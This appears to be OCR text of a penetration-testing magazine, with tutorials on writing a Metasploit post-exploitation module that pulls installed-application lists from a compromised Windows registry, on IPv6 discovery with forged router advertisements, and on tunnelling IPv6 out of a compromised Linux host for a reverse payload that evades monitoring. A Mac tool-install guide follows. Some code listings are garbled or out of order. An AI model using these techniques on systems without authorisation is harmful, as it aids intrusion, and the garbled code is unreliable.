Include Msf : : Exploit : : Remote : : TCP 

This line will include the functionality of a remote 
TCP scan in the module. This line will pull out the 
main scan module libraries from the metasploit li- 
brary (Listing 5). 

The next few lines of script give us an introduc- 
tion about the module like its name, version, au- 



Listing 10. Defining different columns 



thor, description etc (Listing 6). The next few lines 
of the script are used to initialize values for the 
script. The options which are marked as 'true' are 
those which are essentially required for the mod- 
ules whereas the options marked as false are op- 
tional. These values can be passed/changed dur- 
ing the execution of a module. 

The best way to learn about modules is by mas- 
tering ruby scripting and by analyzing existing 
modules. Let us analyse a simple module here 
in order to dive deeper into module building. We 
will be analyzing ftp anonymous access module. 
You can find the main script at the following lo- 
cation; pentest/ exploits/ framework3 /modules/ 
auxiliary/ scanner/ftp/ anonymous . rb. 

Let us start with the analysis of the main script 
body to understand how it works. 

def run_host (target_host) 
begin 

res = connect_login (true, 
false) 



def app_list 

tbl = Rex : : Ui : : Text : : Table . new ( 

'Header' => "Installed Applications", 
'Indent' => 1, 
'Columns' => 
[ 

"Name", 



]) 

appkeys = [ 

'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' , 
'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' , 
'HKLM\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\CurrentVersion\\ 
Uninstall' , 

'HKCU\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\CurrentVersion\\ 
Uninstall' , 

] 

apps = [] 

appkeys. each do |keyx86| 

found_keys = registry_enumkeys (keyx86) 
if found_keys 

f ound_keys . each do |ak| 

apps « keyx86 +"\\" + ak 

end 

end 

end 
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banner . strip ! if banner 

dir = Rex: :Text. rand_text_alpha (8) 

This function is used to begin the connection. The 
res variable holds the Boolean value true or false. 
The connect login function is a specific function 
used by the module to establish a connection with 
the remote host. Depending upon the success or 
failure of connection, the boolean value is stored 
in res (Listing 7). 

Once the connection has been setup, the mod- 
ule tries to check if the anonymous user has read/ 
write privilege or not. The write check variable 
checks if a write operation is possible or not. Then 
it is checked weather the operation succeeded or 
not. Depending upon the status the privilege mes- 
sage is printed on the screen. If the write operation 
fails then the status is printed as 'ro' or read-only 
(Listing 8). 

The next function is used to report authorization 
info. It reflects important parameters like host, port, 
user, pass etc. These are the values that appear 



Listing 11. The enumeration process 



to us when we use the sn ow options command so 
these values are user dependent. 

This was a quick demonstration of how a simple 
module functions within the framework. You can 
change the existing scripts accordingly to meet 
your needs. This makes the platform extremely 
portable to development. As I have said it, the best 
way to learn more about module building is by ana- 
lyzing the existing scripts. 

Building your own Post Exploitation 
module 

Now we have covered up enough background 
about building modules. Here we will see an ex- 
ample of how we can build our own module and 
add it into the framework. Building modules can be 
very handy as it will give us the power of extending 
the framework depending on our need. 

Let us build a small post exploitation module 
that will enumerate all the installed applications 
on the target machine. Since it is a post exploita- 
tion module, we will require a compromised target 



t = [] 

while (not apps . empty?) 
l.upto(16) do 

t « framework. threads . spawn ("Module (#{ self . refname} ) false, apps. shift) do |k| 
begin 

dispnm = registry_getvaldata ("# { k} " , "DisplayName" ) 
dispversion = registry_getvaldata ("# { k} "DisplayVersion" ) 
tbl « dispnm dispversion if dispnm and dispversion 
rescue 
end 

end 

Listing 12. The functions of the script 

results = tbl.to_s 

print_line ("\n" + results + "\n") 

p = store_loot ("host .applications", "text/plain", session,, results, "applications. 

txt", "Installed Applications") 
print_status ("Results stored in: #{p}") 

end 

def run 

print_status ("Enumerating applications installed on # { sysinf o [ ^Computer' ] } ") 
app_list 

end 

end 
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in order to execute the module. To start with build- 
ing the module we will first import the framework 
libraries and include required dependencies (List- 
ing 9). 

The script starts with including the metasploit 
core libraries. Then we build up the class that ex- 
tends the properties of Msf : :Post modules. 

Next we create the initialize function which is 
used to initialize and define the module proper- 
ties and description. This basic structure remains 
the same in almost all modules. Now our next 
step will be to create a table that can display 
our extracted result. We have a special library 
Rex: :ui: : Text which can be used for this task. 
We will have to define different columns (Listing 
10). 

The script body starts with building the table and 
providing different column names. Then a sepa- 
rate array of registry locations is created which will 
be used to enumerate the application list. The ap- 
plication information is maintained in a separate 
array named as apps. 

Then we start the enumeration process by run- 
ning a loop that looks into different registry loca- 
tions stored in appskey array (Listing 11). 

The next lines of script populate the table with 
different values in respective columns. The script 
uses in-built function registry getvaldata which 
fetches the values and add them to the table (List- 
ing 12). 

The last few lines of the script is used for stor- 
ing the information in a separate text file called 
applications.txt. The file is populated by using the 
store loot function which stores the complete ta- 
ble in the text file. 

Finally an output is displayed on the screen stat- 
ing that the file has been created and results have 
been stored in it. 

The next step will be to store the complete pro- 
gram in respective directory. You have to makes 
sure that you choose the correct directory for stor- 
ing your module. This will help the framework in 
clearly understanding the utility of module and will 
maintain a hierarchy. 

To identify the location of module storage, there 
are following points you should look at: 

• Type of module 

• Operation performed by the module 

• Affected software or operating system. 

These are a few points to keep in mind before you 
save any module in any folder. Let us consider our 
module. This module is a post exploitation mod- 
ule that is used to enumerate a windows operat- 



ing system and gathers information about the sys- 
tem. So our module should follow this convention 
for storing. 

So our destination folder should be modules/ 

post /windows /gather/. 

You can save the module with your desired name 
and with a .rb extension. Let's save it as enum_ 

applications . rb. 

Making the Module work 

Once we have saved the module in its preferred di- 
rectory, the next step will be to execute it and see 
if it is working fine. 

msf> use post/windows/gather/enum_applications 
msf post (enum_applications) > show options 

Module Options (post/windows/gather/enum _ 
applcations) 

Name Current Setting Reguired Description 
SESSION yes The session.. 

This was a small example of how you can build 
and add your own module to the framework. 
You definitely need a sound knowledge of Ruby 
scripting if you want to build good modules. You 
can also contribute to the metasploit community 
by releasing your module and let others benefit 
from it. 
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How to Explore 

the IPv6 Attack Surface with Metasploit 

IPv6 is often described as a parallel universe, co-existing alongside 
existing IPv4 infrastructure in a bid to ease the transition process. 
Often left unmanaged and unmonitored in networks, those IPv6 
packets could provide a great opportunity for the savvy attacker. 
Thanks to the Metasploit framework, exploring the IPv6 attack 
surface has become a lot easier. 



Earlier this year, the creators of the Metasploit 
Framework introduced support for IPv6. 
Adding tools to allow attackers and defend- 
ers to explore this brave new world, and the in- 
creased attack surface it can offer. 

In this article we will introduce Metasploit's three 
IPv6 enumeration modules, how to use them, and 
what they are doing "under the hood". We'll al- 
so cover the core IPv6 concepts that allow these 
modules to function as they do. Finally, we'll take 
a look a configuring an IPv6 tunnel from a compro- 
mised host, to allow the use of a reverse connec- 
tion IPv6 payload over the IPv6 Internet. 

I find few commands as satisfying to execute 
as "msfupdate". To many this may sound like a 
strange statement, but there are plenty of people 
who will completely understand where I'm coming 
from. 

Every time I enter "msfupdate", I sit back in my 
chair and watch as my copy of the Metasploit 
Framework connects to the Metasploit servers and 
downloads the latest modules. I run that command 
at least daily, and every time I do, it always grabs 
me something new to dissect and work into my 
penetration-testing toolbox. 

I'm often surprised by the frequency and volume 
of some of the updates, but really I shouldn't be. Af- 
ter all, the whole purpose of the Metasploit project 
is to provide a modular framework that allows ex- 
ploits to be written in a standardized fashion to en- 
courage community collaboration. Still, it's refresh- 



ing to see that even after the project transitioned 
from a "pure" open source project to commercially 
owned and operated one (Metasploit was acquired 
by Rapid 7 in 2009), the community is still contrib- 
uting, and those contributions are still released un- 
der the original open-source license. According to 
Rapid 7, this will never change. 
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Figure 1. Typical output from "msfupdate" containing new 
additions and updates to existing 
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Earlier this year "msfupdate" fetched some up- 
dates that made me lean forward faster and look 
a little closer than perhaps I normally would. 
Metasploit downloaded a selection of modules 
with "IPv6" in the description. 

IPv6 has been creeping into our lives over the 
past several years. Our operating systems, net- 
work equipment and phones have been gradually 
adding support for the new version of the protocol 
that will keep future networks and the internet run- 
ning, when the current version of the internet pro- 
tocol (IPv4) is finally retired due to address space 
exhaustion. 

As you might expect, IPv6 offers some advantag- 
es over its predecessor. Primarily, the vast address 
space will ensure that theoretically every grain of 
sand on the planet could own an Internet connect- 
ed device and not have to worry about hiding be- 
hind a NAT'ed IP. Additionally, IPv6 supports state- 
less auto-configuration - meaning that network 
administrators will no longer have to set up and 
manage DHCP servers, as IPv6 can "figure itself 
out" via the use of such mechanisms as neighbor 
discovery protocol messages sent via ICMP ver- 
sion 6. 

This is by no means an extensive list of differ- 
ences, but I'd like to pause and consider the sec- 
ond "advantage" of IPv6 I've just mentioned from 
a security perspective. It's this feature of IPv6 that 
the first batch of Metasploit IPv6 modules take ad- 
vantage of. 

One thing should be made very clear before we 
go any further. IPv6 is not any more or less se- 
cure than IPv4. They both do different things in 
different ways, and understanding the differences 
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is key for network administrators to successful- 
ly implement the new protocol in a secure fash- 
ion. The biggest insecurity in IPv6 at the moment 
is that there are very few IPv6-only networks out 
there. 

99% of the time you'll find spots of IPv6 traffic 
wandering across the same wires as its older sib- 
ling, quietly going about its business. Similarly, 
99% of the time you can ask a network adminis- 
trator what they think that traffic is up to and they'll 
reply with something along the lines of "erm, well 
that's just noise, we don't use IPv6 yet". 

They likely aren't doing anything with v6 just yet, 
but that doesn't mean the devices sitting on the 
network aren't. Out of the box, IPv6 is designed 
to "go find the quickest way to the Internet". When 
you think of it like that, perhaps it's time for network 
admins to "get all up" in IPv6's business and see 
what it's up to. After all, if devices are using it to 
communicate freely, then so can we. 

Currently Metasploit features a handful of scan- 
ner modules for IPv6 discovery, and IPv6 enabled 
versions of its traditional payloads. A quick and 
easy way to locate the IPv6 modules is to run the 
command "search ipv6" from within the Metasploit 
Console (Figure 2). 

Let's take a moment to dissect the scanner mod- 
ules, and what we can learn from them. First up is 
"ipv6_multicast_ping", written by wuntee. 

This module sends a number of ICMPv6 pack- 
ets to the various IPv6 addresses that are defined 
as multicast addresses, to which all IPv6 enabled 
hosts should respond. Then it listens for the IC- 
MPv6 echo-reply responses and records both 
the IPv6 address and the hardware (MAC) ad- 
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Figure 2. Currently Metasploit offers three auxiliary scanner modules for IPv6 discovery and multiple payloads that run over IPv6 
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dress of the responding host. Very quickly we can 
learn which hosts on our local network are IPv6 
enabled. When configuring the module we have 
the option of specifying the source IPv6 address 
and source MAC. The only mandatory option is a 
timeout, which is set at 5 seconds by default (Fig- 
ure 3). 

Let's take a closer look at the IPv6 multicast ad- 
dresses we ping with this module. IPv6 addresses 
have a "scope" in which they are considered valid 
and unique. This could be an address in the global 
scope, the site scope, link-local or interface local 
scope. Each scope features a well-known multi- 
cast address, which certain types of host are ex- 
pected to join. The module has a sequential list of 
those addresses that it works its way through. We 
can pull those addresses from the Ruby code for 
the module. 

• FF01::1 - All nodes on the interface-local 
scope. 

• FF01::2 - All routers in the interface-local 
scope. 

• FF02::1 - All nodes in the link-local scope. 

• FF02::2 - All routers on the link-local scope. 

• FF02::5 - All OSPFv3 link state routers. 

• FF02::6 - All OSPFv3 designated routers. 

• FF02::9- All RIP routers. 

• FF02::a - All EIGRP routers. 

• FF02::d - All Protocol Independent Multicast 
routers. 

• FF02::16 - Multicast Lister Discovery reports. 

• FF02::1:2 - All DHCP servers in the link-local 
scope. 

• FF05::1:3 - All DHCP servers in the site-local 
scope. 

To better understand the idea of IPv6 scopes we 
can compare them to their IPv4 equivalents. The 
global scope is best compared to any public IP 
address range in IPv4. A global IPv6 address can 
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Figure 3. Quickly locating nearby IPv6 enabled hosts with 
ipv6_multicast_ping 



uniquely identify a host on the Internet. Site-local 
should be considered equivalent to RFC1918 pri- 
vate IP addressing and is used within a specific 
site, such as an office. Interface-local is similar to 
an APIPA or 169* IPv4 address, and is automat- 
ically generated to allow communication across a 
link without the need for any other routing infor- 
mation. 

One difference between link-local addresses in 
IPv6 and IPv4 is that there always needs to be one 
assigned to every IPv6 enabled interface - even 
when it has other addresses. That means that as 
long as there is IPv6 on the network, there will 
be link-local addresses in the link-local multicast 
scope. You can spot a link-local address because 
it will have the prefix "fe80". As you might expect, 
these addresses cannot be routed over the Inter- 
net. So while they can be used to communicate 
with a machine in the same layer 2 broadcast do- 
mains as the host you are working from, if you want 
to be able to have fun across the IPv6 Internet, a 
global address is required. We'll talk about obtain- 
ing one of those later. 

Our next Metasploit module is "ipv6_neighbor", 
created by belch <>. This enumeration module 
takes advantage of Neighbor Discovery Proto- 
col (NDP). NDP uses a subset of ICMPv6 pack- 
ets used by IPv6 to perform various auto-config- 
uration and link state monitoring tasks to find the 
link-local addresses of IPv6 hosts within the same 
segment. 

As an aside, one such NDP task is determining 
if it's intended link-local address is already in use. 
This process, imaginatively called duplicate ad- 
dress detection (DAD), is actually prone to denial 
of service. Tools exist, although not presently mod- 
ulized in Metasploit, which will respond to all DAD 
requests with "address in use" messages. This will 
prevent any new IPv6 devices that join the network 
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Figure 4. Mapping the relationship between IPv4 and IPv6 
link-local addresses 
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from configuring a link-local address, as every op- 
tion it advertises will be reported as a duplicate. 
One such tool for this task is "dos-new-ip6" written 
by van Hauser. 

Back to the module in question. Its purpose is 
to take an IPv4 range and show you the relation- 
ship between the IPv4 and IPv6 addresses on the 
target network. This allows you to quickly identify 
which hosts are dual-stacked, that is, running both 
IPv4 and IPv6 side by side (Figure 4). 

To do this it actually completes two tasks as 
part of its execution. The first is a blast from the 
past - we perform an ARP sweep of the given 
IPv4 range, to learn the MAC address of each 
IPv4 host. Secondly it will send an ICMPv6 neigh- 
bor solicitation packet, from which we'll learn the 
MAC address of the IPv6 enabled host. Compare 
the two MAC addresses, if any match - we have 
our mapping. 

Seeing these two processes side-by-side is in- 
teresting as ICMPv6 neighbor discovery is IPv6's 
ARP replacement, and we can compare the way 
they go about doing the same job. Unlike IPv4, 
IPv6 does not implement broadcast. The reason 
for this is efficiency. Traditional ARP uses broad- 
cast to query all the hosts on the subnet to find 
the MAC address of an IPv4 host so it can make 
a layer 2 delivery. In other words, everyone gets 
bugged every time someone wants to locate a 
MAC address. 

In IPv6, the process relies on multicasting 
- which is means that fewer hosts get bugged and 
the address resolution process is much quicker. 

Neighbor solicitation packets are sent to a spe- 
cial kind of multicast address - known as a solic- 
ited-node multicast address. Each IPv6 interface 
will have such an address and its purpose is to 
provide the layer 2 (mac address) of the host. 
These addresses are generated using an simple 
algorithm, which will drop all but the last 24 bits of 
the hosts regular unicast address and append it 

With the prefix FF02: :1:FF00: 0/104. 

Using Wireshark to capture the ICMPv6 pack- 
ets sent out by the Metasploit module we can see 
these addresses in action (Figure 5). 

Notice how in packets 231 and 232, we send a 
neighbor solicitation to the solicited-node multicast 
address ff02: :i:ff8f :ddb3, and we get our re- 
sponse back in the form of a neighbor advertise- 
ment from the unicast link-local address of the host 

(fe80: :7256:81ff :fe8f :ddb3). An ICMPv6 neighbor 

advertisement can either be sent in response to a 
solicitation, as we've just shown, or it can be sent 
unsolicited to an all-node multicast address to in- 
form neighbors of a change in address or link state. 
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The final scanner module currently in Metasploit 

IS ipv6 neighbour router advertisement, which 

like ipv6_muiticast_ping is also written by wun- 
tee. 

ICMPv6 router advertisements and solicitations 
are fairly similar to neighbor advertisements and 
solicitations, but as you can probably guess, are 
used to discover routers rather than "regular" 
hosts. Routers transmit advertisements on a reg- 
ular basis via multicast, and also in response to 
router solicitations from hosts on the network. 

This module will aim to enumerate link-local 
IPv6 addresses by crafting and transmitting false 
router advertisements for a new network prefix 
via multicast. In turn this will trigger any hosts in 
that multicast scope to start the auto-configura- 
tion process, create a new global IPv6 address 
on its interface and send a neighbor advertise- 
ment for that address. The module will then ma- 
nipulate the IPv6 address in the advertisement, 
dropping the newly acquired global prefix and 
replacing it with the standard link-local prefix. Fi- 
nally, to confirm that the enumerated address is 
in fact alive it will send out a neighbor solicitation 
message. 

This works under the assumption that the operat- 
ing system uses the same interface portion of the 
IPv6 address on all of its addresses (Figure 6). 

So let's take a closer look at the module in action. 
We don't need to provide any options other than a 
couple of timeout parameters, which by default are 



set at 5 and 1 seconds respectively. Once we run 
the module it will begin sending advertisements 
for the network prefix 2001:1234: dead: beef to the 
multicast address ffo2 : : 1, which as we know from 
earlier is "all nodes in the link-local scope". Inci- 
dentally, this network prefix is hard coded into the 
module's source (Figure 7). 

Upon receipt of the advertisement all hosts on 
the local scope will begin auto-configuration of a 
new IPv6 address within the new prefix (Figure 8). 

Of the three enumeration modules we've looked 
at, this is by far the nosiest and therefore the most 
likely to be detected. We are actually taking the 
time to set an address on the remote host, and 
there is no guarantee that the interface portion of 
the new address will match the link-local address 
calculated by the module. Some systems imple- 
ment randomization in the interface portion. Hav- 
ing said that, it's always good to have different 
ways of achieving the same goal! 

So far we've concentrated on the auxiliary mod- 
ules in the Metasploit framework and doing some 
basic IPv6 enumeration in the link-local scope. 
This is an important first step and assumes that 
you already have some sort of foothold into the 
network, but let's say we now want to take things 
one-step further. We are going to try a break out 
onto the IPv6 Internet, and that means we'll need 
a tunnel. 

The idea of tunneling out using IPv6 encapsulat- 
ed in IPv4 packets is a very attractive proposition, 
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Figure 5. ICMPv6 NDP packets, sent initially to the solicited-node multicast addresses of each host 
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Figure 6. Using false router advertisements with "ipv6_ 
neighbor_router_advertisement"to obtain link-local 
addresses 



Figure 7. Sending an ICMPv6 router advertisement message 
for the network prefix "2001:1234:dead:beef", as captured by 
Wireshark 
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as many controls, such as IPS/IDS and firewalls 
will not be configured to alert on or prevent such 
traffic leaving. 

So the scenario is as follows - we've compro- 
mised a Linux machine using Metasploit and we 
have a shell. The host has IPv6 support and a 
link-local address. Now we want to create a glob- 
al IPv6 address on the box to allow it to commu- 
nicate back to us over the IPv6 Internet for extra 
obscurity. 

You need two things to get an IPv6 tunnel to work 
- a tunnel broker, of which there are plenty, many 
of them are free of charge. Secondly, if the box 
you are working on is behind a NAT device, it must 
support the forwarding of protocol 41 - in other 
words, IPv6 encapsulated in IPv4. If we are behind 
a NAT device that doesn't forward protocol 41 , we 
are out of luck (Figure 9). 

For the purposes of this example I'll be using 
a tunnel provided by Hurricane Electric (he.net). 
Once signed up, the tunnel broker provides both 
a client and server IPv6 address, and an IPv4 ad- 
dress of the tunnel broker server. 

These values will be as follows: 

HE.net Tunnel Server IPv4 address - 72.52.104.74 
HE.net Tunnel Server IPv6 address - 2001:DB8::20 
Target Network Outside NAT IPv4 address - 1.1.1.1 



ml: f Lags=S863<UP , BROADCAST, RUINING, SIWLEX, MULTICAST^ nrtu 15» 
ether 79:56;Sl: Sf:dd:b3 

inetti fe80;:7256:8lff:fe8f:d*3tera prefixlen 64 scope id 8x5 
inrt 192,168,0,101 netwsk 0x ffffff 09 broadcast 192,168,0,255 
media: autoselect 
status; active 



Hill: f\aQi~iMi^]P T bpDauCast , smart , kuwinG p siVFLt,* , HfLTiCASTy rrtu ism 

iwtfi ffB0::7?W:fi1ff:feflf:d*^n1 pr^fixUn 64 smpr-id 0xS 

Incft iez,m,b,m nrtmwk taffffffW broodcttt 192,166^*55 

inet6 2^1:l234:deod:beef:725^:Blff:feaf;clefca prefixlen 64 tentative autqwnf 

media: autoselert 



Figure 8. Two outputs of "ifconfig" on a Mac OS X machine 
on the same network as our Metasploit instance. The first 
output is pre-false advertisement, the second is just after. 
Notice the addition of a "deadibeef" IPv6 address, thanks to 
auto-configuration 



jthe Link ena?; Ethernet WfacMr 80 =60:27: e4 

tnet «ttr:l92,l«LA,115 Beast: 1*2, 166.0. 255 Mask: 255.255.255,8 
inrt* addr; ff#G; ;3»;£rff jfwrf; 1*3/64 S«pc;Link 
UP BROADCAST RUMdlNG MULTICAST MTU; 15^ Metric: 1 
RX packets: 5*493 errors; 0 dropped :0 overruns: 8 fraw:0 
TX pockets: 3^70 errors ;0 dropped; 9 overruns ;0 carrier ;0 
collisions :0 txqueuelon:im 

RX bytw:5255798 ($,2 MB) TX byt«;4473©5 (447,3 KB) 

Lo Link encap: Local Loopbcck 

I net addr:127.e.B.l Mask: 255.9.6.6 

inrt6 oddr; 1/128 S«p*j;Hwt 

UP L00PBAOC RLHONG MTU: 16436 Metric :1 

RX pockets: 1746 errqrs;0 dropped; 8 overruns;© frane:0 

TX packets: 1748 errors:© drnpped:ft overruns:© carrier; A 

colli signs ;0 txqueuelen;9 

RX byte* : 125729 CL25.7 KB) TX bytes; 125729 Q2$ ? KB) 



Target Machine IPv4 Address - 192.168.0.115 
Target Machine IPv6 Address - 2001:DB8::21 

Note 

You may have noticed the outside IPv4 and IPv6 
addresses used in this example will not work in 
real life. The IPv6 address prefix I've used is re- 
served for documentation, and is not routable over 
the Internet. 

When configuring the tunnel in the he.net site, you 
must provide the outside IPv4 address of the target. 
It should also be noted, that he.net site requires that 
this address responds to ping (Figure 10). 

Back on our victim machine, we run a few com- 
mands to bring up the new tunnel interface and set 
up a route to ensure all IPv6 traffic goes via that 
new interface. 

"ip tunnel add ipv6inet mode sit remote 
72.52.104.74 local 192.168.0.115 ttl 255" - This 
creates a SIT (simple internet transition) interface 
named ipv6inet and defines the local and remote 
IPv4 addresses for the tunnel endpoints, or in oth- 
er words, the IP of the target machine and tunnel 
server. 

"ip link set ipv6inet up" - This brings the tunnel 
interface up. 
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Figure 10. Signing up for an IPv6 tunnel from Hurricane 
Electric (ipv6.he.net) 
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Figure 9. On the compromised Linux host "webappl", ethO 
has an IPv4, and link-local IPv6 address 



Figure 11. Creating an IPv6 tunnel interface on the target 
machine 
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ip addr add 2001:db8::21 dev ipv6inet - This 

assigns the IPv6 address to the interface. 

ip route add : :/0 dev ipv6inet — This Com- 
mand will add a route to send all IPv6 traffic across 
the new tunnel interface (Figure 11). 

A quick way to confirm that the IPv6 Internet 
is now within our reach is to use the ping6 utili- 
ty to hit an IPv6 website. In this case ipv6. google, 
com, which has the address 2607:f8bO:4ooe:coo 

: : 93. 

This tunnel can now be used by a Metasploit re- 
verse connection payload to connect to an attack- 
er with a global IPv6 address of their own, which of 
course can be obtained in exactly the same way as 
we've just shown. 

Let's say in this example we want our payload to 
connect back to us at the address 2001 :db8: :99 
(Figure 13). 

Configuring an IPv6 payload in Metasploit is es- 
sentially the same as an IPv4 payload, but there 
are a couple of minor differences. Obviously, you 
must specify an IPv6 address for your listener (or 
target if a binding payload), and also if using a link- 
local address on a host with multiple interfaces, 
you should specify the scope ID. 
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Figure 12. Sending ping packets to Google over the IPv6 
Internet using our new tunnel interface 
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Figure 13. Setting up an IPv6 payload in Metasploit 
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To summarize, let's take one last look at the sce- 
nario we've just discussed (Figure 14). 

Conclusion 

For many out there, the mere sight of an IPv6 
address is enough to put them off learning more 
about the protocol. This is the biggest vulnerability 
in IPv6, and like most security vulnerabilities, it's 
a human problem. The protocol is being adopted 
in devices at a much quicker rate than people are 
willing to manage and configure it properly. 

For attackers, this provides great opportunities to 
jump on the unmanaged jumble and use it to build 
something that can be used to move around net- 
works in ways that the owners of those networks 
aren't expecting. 

For defenders, this means developing a whole 
new security model with emphasis on securing the 
endpoints rather than the perimeter. After all, IPv6 
doesn't hide behind NAT like its predecessor. 

By introducing IPv6 payloads and modules the 
Metasploit framework has given both groups new 
tools to better understand and manipulate the 
IPv6 protocol. Of course, we are only just getting 
started. The nature of the Metasploit community 
is to constantly build, innovate and improve upon 
what is already in place. These initial modules 
will act as a catalyst for further development in 
IPv6 enumeration and exploitation. Remember 
that the next time you run "msfupdate", and keep 
one eye open for new ways to use IPv6 for ex- 
ploitation. 



Figure 14. An overview of our IPv6-over-IPv4 tunnel set up 
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How to Use The Mac 
OS X Hackers Toolbox 

When you think of an operating system to run pen testing tools on, 
you probably think of Linux and more specifically BackTrack Linux. 
BackTrack Linux is a great option and one of the most common 
platforms for running pen testing tools. If you are a Mac user, then 
you would most likely run a virtual machine of BackTrack Linux. 



While his is a great option, sometimes it is 
nice to have your tools running on the 
native operating system of your comput- 
er. Another benefit is to not having to share your 
system resources with a virtual machine. This also 
eliminates the need to transfer files between your 
operating system and a virtual machine, and the 
hassles of having to deal with a virtual machine. 
Also by running the tools within OS X, you will be 
able to seamlessly access all of your Mac OS X 
applications. 

My attack laptop happens to be a MacBook Pro 
and I started out running VirtualBox with a Back- 
Track Linux virtual machine. I recently started in- 
stalling my hacking tools on my MacBook Pro. 
I wanted to expand the toolset of my Mac, so I 
started with Nessus, nmap, SQLMap, and then I 
installed Metasploit. My goal is to get most if not 
all of the tools I use installed on my MacBook Pro 
and run them natively within OS X. Since Mac 
OS X is a UNIX based operating system, you get 
great tools that comes native within UNIX operat- 
ing systems such as netcat and SSH. You also 
have powerful scripting languages installed such 
as Perl and Python. With all of the benefits and 
features of the Mac OS X, there is no reason to 
not use Mac OS X for your pen testing platform. I 
was really surprised to not see a lot of information 
on the subject of using Mac OS X as pen testing/ 
hacking platform. Metasploit was the toughest ap- 
plication to get running on Mac OS X and that was 



mostly due to the PostgreSQL database setup. 
The majority of hacking tools are command line 
based, so they are easy and are fairly straight for- 
ward to install. 

In this article I am going to take you through in- 
stalling and configuring some of the most popu- 
lar and useful hacking tools such as Metasploit on 
Mac OS X. If you are interested in maximizing the 
use of your Mac for pen testing and running your 
tools natively, then you should find this article help- 
ful. 

The Tools 

The pen test tools we will be installing is a must 
have set of tools and all of them are free, with the 
exception of Burp Suite and Nessus. Although 
Burb Suite has a free version, which offers a por- 
tion of the Burp Suite tools for free. The tools of- 
fered for free with Burp Suite are useful tools and I 
highly recommend them. The professional version 
of Burp Suite is reasonably priced. 

• Metasploit Framework 

• Nmap 

• SQLmap 

• Burp Suite 

• Nessus 

• SSLScan 

• Wireshark 

• TCPDUMP 

• Netcat 
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Metasploit Framework 
The Metasploit Framework is one of the most pop- 
ular and powerful exploit tools for pen testers and a 
must have for pen testers. The Metasploit Frame- 
work simplifies the exploitation process and allows 
you to manage your pen tests with the workspace 
function in Metasploit. Metasploit also allows you 
to run nmap within Metasploit and the scan infor- 
mation is organized by project with the workspace 
function. You can create your own exploits and 
modify existing exploits in Metasploit. Metasploit 
has many more features and too many to mention 
in this article, plus the scope of this article is dem- 
onstrate how to install Metasploit and other pen 
testing tools. 

The Install 

Before we install Metasploit, we need to install 
some software dependencies. It is a little more 
work to install Metasploit on Mac OS X, but it will 
be worth it. Listed below are the prerequisite soft- 
ware packages. 

Software Prerequisites 

• MacPorts 

• Ruby1.9.3 

• Homebrew 

• PostreSQL 

MacPorts Installation 
Install Xcode 

• Xcode Install from the Apple App Store, or it 
can be downloaded from the following URL; 
https://developer. apple, com/xcode/ 

• Once Xcode is installed go into the Xcode pref- 
erences and install the "Command Line Tools", 
(see Figure 1) 
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Figure 1 . Install "Command Line Tools" 



Install the MacPorts app 

• Download and install the package file (.dmg) 
file from the MacPorts web site; https://distfiles. 
macports. org/MacPorts/ 

Once the files is downloaded install MacPorts. 
More information on MacPorts can be found 
here: http://www.macports.org/install.php 

• Run MacPorts selfupdate to make sure it is us- 
ing the latest version. 

From a terminal window run the following com- 
mand: 

$ sudo port selfupdate 

Ruby 1.9.3 

Mac OS X is preinstalled with Ruby, but we want to 
upgrade to Ruby 1.9.3 

• We will be using MacPorts to upgrade Ruby. 
From a terminal window run the following com- 
mand: 

$ sudo port install rubyl9 +nosuffix 

• The default Ruby install path for MacPorts is: / 

opt/local/ 

It's a good idea to verify that the PATH is cor- 
rect, so that opt/iocai/bin is listed before / 
usr/bin. You should get back something that 
looks like this: 

/ opt /local /bin : /opt/local/sbin : /usr/bin: /bin: / 
usr/ sbin : / sbin 

You can verify the path by entering the follow- 
ing syntax in a terminal window: 

$ echo $PATH 

To verify the Ruby install locations, enter this 
syntax: 

$ which ruby gem 

You should get back the following response: 

/opt/local/bin/ ruby 
/opt /local /bin/ gem 

Database Installation 

A database is not required to run, but some of the 
features of Metasploit require that you install a data- 
base. The workspace feature of Metasploit is one of 
the really nice features of Metasploit that requires a 
database. Workspace allows easy project organiza- 
tion by offering separate workspaces for each proj- 
ect. PostgreSQL is the vendor recommended and 
supported database, but MySQL can be used. In 
this article, we will be using PostgreSQL. 

We will use Homebrew to install PostgreSQL. I 
tried a few different installation methods, but this is 
the easiest way to install PostgreSQL. Homebrew 
is good method to install Open Source software 
packages. 
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• First we will install Homebrew. 

From a terminal window run the following com- 
mand: 

$ ruby -e (curl -fsSkL raw.github.com/mxcl/ 
homebrew/go) " 

• Next we will install PostgreSQL using Home- 
brew. 

From a terminal window run the following com- 
mand: 

$ brew install postgresql 

• Next we initialize the database, configure the 
startup, and start PostgreSQL. 

From a terminal window run the following com- 
mand: 

initdb /usr/local/var/postgres cp /usr/ 
local /Cellar /postgresql/ 9.1. 4 /homebrew .mxcl . 
postgresql .plist -/Library/LaunchAgents/ 
launchctl load -w -/Library/LaunchAgents/ 
homebrew. mxcl .postgresql .plist pg_ctl -D / 
usr/local/var/postgres -1 /usr/local/var/ 
postgres/server . log start 

• Database configuration 

In this step we will create our Metasploit data- 
base and the database user. 

• The Homebrew install does not create the pos- 
gres user, so we need to create the postgres 
user to create databases and database users. 

At a command prompt, type the following: 

$ createuser postgres _ user -P 

$ Enter password for new role: password 

$ Enter it again: password 

$ Shall the new role be a superuser? (y/n) y 
$ Shall the new role be allowed to create 

databases? (y/n) y 
$ Shall the new role be allowed to create 

more new roles? (y/n) y 

• Creating the database user 

At a command prompt, type the following: 

$ createuser msf _ user -P 

$ Enter password for new role: password 

$ Enter it again: password 

$ Shall the new role be a superuser? (y/n) n 
$ Shall the new role be allowed to create 

databases? (y/n) n 
$ Shall the new role be allowed to create 

more new roles? (y/n) n 

• Creating the database 

At a command prompt, type the following: 

$ createdb ~owner=msf _ user msf _ database 

• Install the pg gem. 

At a command prompt, type the following: 

$ gem install pg 

The database and database user are created, so 
now it is time to install Metasploit. 



Metasploit software installation 

The dependencies have been installed and next 
we will be installing the Metasploit software. 

• Download the Metsploit source code for in- 
stallation using the link provided below and do 
not download the .run file from the Metasploit 
download page. Download the Metasploit tar 
file from: http://downloads.metasploit.com/data/ 
releases/framework-latest, tar. bz2. 

• Once the download is complete, untar the file. 
If you have software installed to unzip or untar 
files, then it should untar the file when the file 
is finished downloading. I use Stufflt Expander 
and it untarred the file for me upon completion 
of the download. If you need to manually un- 
tar the file, type this command at the command 
